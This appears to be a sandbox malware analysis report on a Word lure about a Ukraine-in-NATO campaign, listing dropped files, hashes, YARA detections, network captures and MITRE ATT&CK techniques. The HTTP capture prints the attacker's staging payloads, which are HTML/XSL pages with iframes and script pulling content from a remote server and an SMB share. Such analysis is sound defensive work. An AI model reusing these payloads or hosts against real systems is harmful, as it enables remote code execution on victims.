Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025596957129929574
Encrypted:	false
SSDEEP:	6:I3DPcImawJvxggLRxhLqxbqz5lltRXv//4tfnRujlw//+GtluJ/eRuj:I3DPTcfLq4z5/TvYg3J/
MD5:	4739A915E336960B9C3A46AA34266E69
SHA1:	31EDDA5412259DD0688230A27DB60031437BCA89
SHA-256:	5FA10331B5F0752BFA52C512C4F61BEFEC4B0F24F7B457278EA07CF92755E1B5
SHA-512:	DBAFFF494BB3329C3B911A83D5E4A6EA7BDCF7C8542D34862C19F8590D7C16DCC3BAB6725D724F9592E5003C92D5055674F41C4C638C563DE7AB73F5E1416B3B
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.q.._LrI...l.C.wS,...X.F...Fa.q..............................i...+O.P...%..........=.`...B...q...V.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF0933009CB7A48061.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF242FA8E3B8CD150B.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Overview_of_UWCs_UkraineInNATO_campaign.docx.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut
Category:	dropped
Size (bytes):	1184
Entropy (8bit):	4.639634473157181
Encrypted:	false
SSDEEP:	24:8G/XTIyYANFIMSePe119MSeWDv3qtcX7cY:8G/XTEkxttKl
MD5:	71529687CE50EE1BAA66F4B10BD0910C
SHA1:	558412B1021048D60CF3F336C6EDBF7354493B8E
SHA-256:	417DA4EC0170A7519E5400B0CA561E871F77772B0E38110C1066A7C93BBABAC0
SHA-512:	669AA112DCD76428EB332ECD4221BAB1FE59A789F14E7478127A487AAA34FA2003DDB67DF8096C0CFD57EE40839A8F4F939DE7C9670A517487A5E841C484431F
Malicious:	false
Reputation:	low
Preview:	L..................F.... .......3......3..@0.~....&............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT...user.8......QK.XhT....&=....U...............A.l.b.u.s.....z.1.....hT...Desktop.d......QK.XhT...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.&....V . .OVERVI~1.DOC.........hT.hT..../.....4...............O.v.e.r.v.i.e.w._.o.f._.U.W.C.s._.U.k.r.a.i.n.e.I.n.N.A.T.O._.c.a.m.p.a.i.g.n...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop\Overview_of_UWCs_UkraineInNATO_campaign.docx.doc.G.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.v.e.r.v.i.e.w._.o.f._.U.W.C.s._.U.k.r.a.i.n.e.I.n.N.A.T.O._.c.a.m.p.a.i.g.n...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\file001.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	CDF V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eduardo, Template: Normal.dotm, Last Saved By: Eduardo, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Apr 12 14:11:00 2022, Last Saved Time/Date: Tue Apr 12 14:11:00 2022, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Category:	dropped
Size (bytes):	23870
Entropy (8bit):	3.126890272974214
Encrypted:	false
SSDEEP:	192:zWjUlLZEvA+6/6rNavrgYjk+4bWl92zBi1RH1rGOJU:zWjo8iSwvxjk+t9+i1RH1rG3
MD5:	26A6A0C852677A193994E4A3CCC8C2EB
SHA1:	70560AFF35F1904F822E49D3316303877819EEF8
SHA-256:	07377209FE68A98E9BCA310D9749DAA4EB79558E9FC419CF0B02A9E37679038D
SHA-512:	BF35991FEC81B96EAE2CE5C90AE627DD6CF11C61C5369DC34BBBC65E24C3E1F413F475BDB8321F455E5F4B6EAA833B3D33F847C744C68AE6E853A373AD2B37AE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RTFMSHTMLIFRAME, Description: Yara detected RTF with MSHTML iframe injection, Source: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\file001.url, Author: Joe Security
Reputation:	low
Preview:	......................>.........<html>........'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................=.............................bjbj..............................L..hL..h..................................................................................F.......F...............................................................................................................t...................................................................M.......O.......O.......O.......O.......O.......O...$...B...........F...s.....................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\file001.url:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:gAWYp:qYp
MD5:	ACC88D3264FC06AE3584A8ED90009260
SHA1:	FD63700F852BE379C417253CA869CC1C5E2F46A0
SHA-256:	E9066838A2265B9327318C602ED6954BC1A26869C19FAA255CD26A3C7CE707A7
SHA-512:	CB41EF87941B26F1CB25DB61536A6C89F3B7A3BC67B4CFBE7290DD528DACC6870A08CDC2AABAF289382A5CD7EF96C95556B05B8EAD3FB1317DFCD18B6302E456
Malicious:	false
Reputation:	low
Preview:	[ZoneTransfer]..ZoneId=1..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	139
Entropy (8bit):	5.044070012692621
Encrypted:	false
SSDEEP:	3:bDuMJlyUzXG97UIf4B8m1ddLFSmX1oADzXG97UIf4B8m1ddLFSv:bCqX/IS8mjdLFe4X/IS8mjdLFc
MD5:	60908E7940910E28533F1A7C98608E5A
SHA1:	DC38E872A1782FFDF39EC09E1B76984D7164ADB8
SHA-256:	D6EF438F7901A55E560C50C9207AC62456FB4E8183CDC899777198262CC14DD4
SHA-512:	0B45AC46CE70F28FB7BDFC9D7DDEA586EB46F768B71302E288BAC894559D38922BFE91B8C5450C2E089CFD7CD890161B9EAB4A272CC81BB8DA09BE97AE7EA225
Malicious:	false
Reputation:	low
Preview:	[folders]..Templates.LNK=0..Overview_of_UWCs_UkraineInNATO_campaign.docx.LNK=0..[doc]..Overview_of_UWCs_UkraineInNATO_campaign.docx.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Reputation:	low
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

C:\Users\user\Desktop\~$erview_of_UWCs_UkraineInNATO_campaign.docx.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Reputation:	low
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

\Device\Mup\104.234.239.26\PIPE\srvsvc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.666926004035285
Encrypted:	false
SSDEEP:	3:rmHfvtH//SWYhtC4d1ydYht1gUUGk+ltqqYhtq5kZty:rmHcaSgNGFlhYty
MD5:	3317A43D2D73F6EDEC6009C461A003A8
SHA1:	E45BBBE7C4303B6D0E566F93D1306E121C5D0AED
SHA-256:	958864BEC871FCC14EB8B8245433C6D827311E86EC980566ECFD60EDCEBBAC18
SHA-512:	09BBC8695DB0FCE4AB9FB993CB9FD33431C75839556CAD51B2B7348A4A13F88EAEC435CC48201252B848E2A0EBD5CE8028964692E4A2FF779482D523DDFE841A
Malicious:	false
Reputation:	low
Preview:	.................................O2Kp....xZG.n......]..........+.H`.........O2Kp....xZG.n.....3.qq..7I......6.........O2Kp....xZG.n.....,..l..@E............

\Device\Mup\104.234.239.26\PIPE\wkssvc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.577654635909331
Encrypted:	false
SSDEEP:	3:rmHfvtH//Sy3yeM1y73yeUUGk+l91F3ye0Zty:rmHcy3HL73HNGFlXF3HIty
MD5:	86EFD27334586B592E7BFBD0E143C450
SHA1:	E8D1FF64BB20235FD4AF6D8051A4CD4A19B91BDE
SHA-256:	4AA9CA41BA628CDB8E337FCD8929F6BD8D68997E120A8C925BFA1C311AD7DFB4
SHA-512:	3FA13E0456C17D061B40F512CD5615F0B46F82E2095F82C0EB4D1D3E8DAF1ECE475028EB77C78C0FF91E034B745F3FD3C1F0C5AE87FBAEB69F67B1C69F547048
Malicious:	false
Reputation:	low
Preview:	...................................k...6.3F..~4Z.....]..........+.H`...........k...6.3F..~4Z....3.qq..7I......6...........k...6.3F..~4Z....,..l..@E............

Static File Info

General

File type:	Zip archive data, at least v2.0 to extract
Entropy (8bit):	7.975913596069179
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	Overview_of_UWCs_UkraineInNATO_campaign.docx.doc
File size:	120614
MD5:	d227874863036b8e73a3894a19bd25a0
SHA1:	2400b169ee2c38ac146c67408debc9b4fa4fca5f
SHA256:	a61b2eafcf39715031357df6b01e85e0d1ea2e8ee1dfec241b114e18f7a1163f
SHA512:	5304a8f4fce0718df717e67b0c91b3aef670f8fa226ee49dc23b72bb677301d310016626433ee8336f393f2afc92609f6c69c99862055c71316bef3f762714ed
SSDEEP:	3072:l7+cULFyt0l7P8trDG5CL1WvRC5pugMExFAiWRXlV:lPrtWuK5C8vE5puiFAimlV
TLSH:	68C312118381678FD3050A79E22DAF72F4B5D352D232A3CAAD42E36DAD8885357C56AC
File Content Preview:	PK..........!.........N......._rels/.rels ...(.................................................................................................................................................................................................................

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2023 19:09:17.982772112 CEST	49182	80	192.168.2.22	74.50.94.156
Jul 3, 2023 19:09:18.082046032 CEST	80	49182	74.50.94.156	192.168.2.22
Jul 3, 2023 19:09:18.082828999 CEST	49182	80	192.168.2.22	74.50.94.156
Jul 3, 2023 19:09:18.083324909 CEST	49182	80	192.168.2.22	74.50.94.156
Jul 3, 2023 19:09:18.183420897 CEST	80	49182	74.50.94.156	192.168.2.22
Jul 3, 2023 19:09:18.185111046 CEST	49182	80	192.168.2.22	74.50.94.156
Jul 3, 2023 19:09:22.347048998 CEST	49182	80	192.168.2.22	74.50.94.156
Jul 3, 2023 19:09:22.486159086 CEST	80	49182	74.50.94.156	192.168.2.22
Jul 3, 2023 19:09:25.932959080 CEST	80	49182	74.50.94.156	192.168.2.22
Jul 3, 2023 19:09:25.933120966 CEST	49182	80	192.168.2.22	74.50.94.156
Jul 3, 2023 19:10:07.929238081 CEST	49182	80	192.168.2.22	74.50.94.156
Jul 3, 2023 19:10:08.069535017 CEST	80	49182	74.50.94.156	192.168.2.22
Jul 3, 2023 19:10:09.692806005 CEST	80	49182	74.50.94.156	192.168.2.22
Jul 3, 2023 19:10:09.692980051 CEST	49182	80	192.168.2.22	74.50.94.156
Jul 3, 2023 19:10:11.022851944 CEST	49182	80	192.168.2.22	74.50.94.156
Jul 3, 2023 19:10:11.161520004 CEST	80	49182	74.50.94.156	192.168.2.22
Jul 3, 2023 19:10:11.721288919 CEST	80	49182	74.50.94.156	192.168.2.22
Jul 3, 2023 19:10:11.721358061 CEST	49182	80	192.168.2.22	74.50.94.156
Jul 3, 2023 19:10:13.040551901 CEST	49182	80	192.168.2.22	74.50.94.156
Jul 3, 2023 19:10:13.141885996 CEST	80	49182	74.50.94.156	192.168.2.22
Jul 3, 2023 19:10:13.141985893 CEST	49182	80	192.168.2.22	74.50.94.156
Jul 3, 2023 19:11:03.098041058 CEST	49182	80	192.168.2.22	74.50.94.156

HTTP Request Dependency Graph

74.50.94.156

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49182	74.50.94.156	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 3, 2023 19:09:18.083324909 CEST	120	OUT	GET /MSHTML_C7/start.xml HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 74.50.94.156 Connection: Keep-Alive
Jul 3, 2023 19:09:18.183420897 CEST	122	IN	HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Mon, 03 Jul 2023 14:29:04 GMT Accept-Ranges: bytes ETag: "b4952ab8baadd91:0" Server: Microsoft-IIS/10.0 Date: Mon, 03 Jul 2023 17:09:18 GMT Content-Length: 576 Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 3f 78 6d 6c 2d 73 74 79 6c 65 73 68 65 65 74 20 74 79 70 65 3d 27 74 65 78 74 2f 78 73 6c 27 20 68 72 65 66 3d 27 23 27 3f 3e 0d 0a 0d 0a 3c 78 73 6c 3a 73 74 79 6c 65 73 68 65 65 74 20 78 6d 6c 6e 73 3a 78 73 6c 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 57 44 2d 78 73 6c 22 20 78 6d 6c 6e 73 3a 78 73 6c 74 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 58 53 4c 2f 54 72 61 6e 73 66 6f 72 6d 22 20 72 65 73 75 6c 74 2d 6e 73 3d 22 22 3e 0d 0a 3c 78 73 6c 3a 74 65 6d 70 6c 61 74 65 20 6d 61 74 63 68 3d 22 2f 22 3e 0d 0a 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 37 22 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 0d 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 27 52 46 69 6c 65 2e 61 73 70 27 20 77 69 64 74 68 3d 27 38 30 30 27 20 68 65 69 67 68 74 3d 27 38 30 30 27 3e 3c 2f 69 66 72 61 6d 65 3e 0d 0a 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 27 27 3e 0d 0a 0d 0a 6c 74 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 36 30 29 3b 0d 0a 67 74 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 36 32 29 3b 0d 0a 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 3c 2f 78 73 6c 3a 74 65 6d 70 6c 61 74 65 3e 0d 0a 3c 2f 78 73 6c 3a 73 74 79 6c 65 73 68 65 65 74 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><?xml-stylesheet type='text/xsl' href='#'?><xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl" xmlns:xslt="http://www.w3.org/1999/XSL/Transform" result-ns=""><xsl:template match="/"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=7"/></head><body><iframe src='RFile.asp' width='800' height='800'></iframe><script defer=''>lt=String.fromCharCode(60);gt=String.fromCharCode(62);</script></body></html></xsl:template></xsl:stylesheet>
Jul 3, 2023 19:09:22.347048998 CEST	188	OUT	GET /MSHTML_C7/RFile.asp HTTP/1.1 Accept: / Referer: http://74.50.94.156/MSHTML_C7/start.xml Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 74.50.94.156 Connection: Keep-Alive
Jul 3, 2023 19:09:25.932959080 CEST	194	IN	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/10.0 Set-Cookie: ASPSESSIONIDCSTDATTC=MPCBNNGBOOGALAFNGIIGMCKJ; path=/ Date: Mon, 03 Jul 2023 17:09:25 GMT Content-Length: 292 Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 20 6f 6e 6c 6f 61 64 3d 73 65 74 54 69 6d 65 6f 75 74 28 27 66 78 28 29 27 2c 33 30 30 30 30 29 3e 3c 69 66 72 61 6d 65 20 73 72 63 3d 66 69 6c 65 3a 2f 2f 31 30 34 2e 32 33 34 2e 32 33 39 2e 32 36 2f 73 68 61 72 65 31 2f 4d 53 48 54 4d 4c 5f 43 37 3e 3c 2f 69 66 72 61 6d 65 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 66 78 28 29 20 7b 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 69 66 72 61 6d 65 20 73 72 63 3d 66 69 6c 65 3a 2f 2f 31 30 34 2e 32 33 34 2e 32 33 39 2e 32 36 2f 73 68 61 72 65 31 2f 4d 53 48 54 4d 4c 5f 43 37 2f 31 2f 38 34 2e 31 37 2e 35 32 2e 35 5f 62 63 38 64 31 5f 66 69 6c 65 30 30 31 2e 68 74 6d 3f 64 3d 38 34 2e 31 37 2e 35 32 2e 35 5f 62 63 38 64 31 5f 3e 3c 2f 69 66 72 61 6d 65 3e 27 3b 20 7d 20 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body onload=setTimeout('fx()',30000)><iframe src=file://104.234.239.26/share1/MSHTML_C7></iframe><script>function fx() { document.body.innerHTML='<iframe src=file://104.234.239.26/share1/MSHTML_C7/1/84.17.52.5_bc8d1_file001.htm?d=84.17.52.5_bc8d1_></iframe>'; } </script></body></html>
Jul 3, 2023 19:10:07.929238081 CEST	345	OUT	GET /MSHTML_C7/zip_k.asp?d=84.17.52.5_bc8d1_ HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 74.50.94.156 Connection: Keep-Alive
Jul 3, 2023 19:10:09.692806005 CEST	347	IN	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/10.0 Set-Cookie: ASPSESSIONIDCSTDATTC=NPCBNNGBNHGFPJKACNKBNHNL; path=/ Date: Mon, 03 Jul 2023 17:10:09 GMT Content-Length: 66 Data Raw: 3c 68 74 6d 6c 3e 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 3c 2f 68 74 6d 6c 3e Data Ascii: <html>11111111111111111111111111111111111111111111111111111</html>
Jul 3, 2023 19:10:11.022851944 CEST	347	OUT	GET /MSHTML_C7/zip_k2.asp?d=84.17.52.5_bc8d1_ HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 74.50.94.156 Connection: Keep-Alive Cookie: ASPSESSIONIDCSTDATTC=NPCBNNGBNHGFPJKACNKBNHNL
Jul 3, 2023 19:10:11.721288919 CEST	347	IN	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/10.0 Date: Mon, 03 Jul 2023 17:10:11 GMT Content-Length: 66 Data Raw: 3c 68 74 6d 6c 3e 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 3c 2f 68 74 6d 6c 3e Data Ascii: <html>11111111111111111111111111111111111111111111111111111</html>
Jul 3, 2023 19:10:13.040551901 CEST	348	OUT	GET /MSHTML_C7/zip_k3.asp?d=84.17.52.5_bc8d1_ HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 74.50.94.156 Connection: Keep-Alive Cookie: ASPSESSIONIDCSTDATTC=NPCBNNGBNHGFPJKACNKBNHNL
Jul 3, 2023 19:10:13.141885996 CEST	348	IN	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/10.0 Date: Mon, 03 Jul 2023 17:10:13 GMT Content-Length: 66 Data Raw: 3c 68 74 6d 6c 3e 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 3c 2f 68 74 6d 6c 3e Data Ascii: <html>11111111111111111111111111111111111111111111111111111</html>

Target ID:	0
Start time:	19:08:59
Start date:	03/07/2023
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f710000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
